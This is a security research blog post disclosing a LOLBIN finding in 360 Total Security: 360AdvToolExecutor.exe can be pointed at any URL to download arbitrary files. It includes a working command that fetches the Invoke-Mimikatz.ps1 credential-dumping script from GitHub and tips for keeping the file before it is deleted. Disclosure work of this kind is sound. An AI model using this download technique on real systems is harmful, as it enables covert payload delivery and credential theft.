LOLBINed — 360TotalSecurity (360AdvToolExecutor.exe)
Introduction
Continuing with the same idea as my last two articles about “F-Secure FSDIAG” and “CyberGhost VPN”, let’s continue our search for LOLBINs in known products. This time I’m taking a look at 360 Total Security
Note: This issue has been reported to the 360 Total Security team but no response was recived as of yet.
360AdvToolExecutor
While I was playing with the 360TS AV product I came across an interesting feature. In the main “Tool Box” interface, the product offers a lot of functionalities as seen in the screenshot below.
Some of these functionalities aren’t available out of the box and need to download specific software.
For example, the highlighted “360 Zip” software will get downloaded once we click on its icon and the following interesting command-line is generated.
"C:\Program Files (x86)\360\Total Security\Utils\360AdvToolExecutor.exe" /TASKTYPE=InstallBySetup /ADVTOOLIDS=360 Zip "/ADVTOOLURL=http://int.down.360safe.com/360zip/360zip_setup.exe" "/SETUPPARAM=/S /pid=tools" /ADVTOOLNOTIFY=197896Looking at this a little bit deeper with “Process Monitor”, we find that this is the process responsible for downloading and installing the “360Zip” software.
So by re-running this exact command in theory we should be able to download anything that’s pointed at by the “/ADVTOOLURL” argument and indeed it works :)
There is a small catch though in that the file will always get downloaded to the following path
%appdata%\360TotalSecurity\360AdvToolExecutor\SetupAnd will get deleted automatically (most of the time, not always consistent in my tests) after a short period (But that’s not an issue as long as you automate the process and quickly copy it elsewhere)
Also, there is some self-protection here the first is that we cannot execute this binary outside of its original location as it’ll show (Corrupted DLL).
The second shows a warning message when executing 360 tools from certain processes. So keep all of this in mind :(
As I’ve said, in order to achieve this, we simply replace the “/ADVTOOLURL” with our own URL and we’re good to go (we can even remove the rest of the arguments as they are not technically needed). Here is an example downloading “Invoke-Mimikatz.ps1”
360AdvToolExecutor.exe /TASKTYPE=InstallBySetup "/ADVTOOLURL=https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1"
Another interesting functionality I noticed with this binary is that the argument “/SETUPPARAM” is used to provide arguments to the downloaded “SETUP” because normally this would download the setup pointed at by the “360AdvToolExecutor” tool and install it (see example below).
I wasn’t able to replicate this with other custom stuff so far (because I'm that dumb) but it’s worth investigating in my opinion.
Achieving a full chain will mean that the “360AdvToolExecutor” binary will download and execute anything from the internet which could be very interesting :)
Conclusion
That’s it for this short blog, I hope you enjoyed reading it. If you want to discuss this blog or anything related to infosec you can find me on Twitter @nas_bench
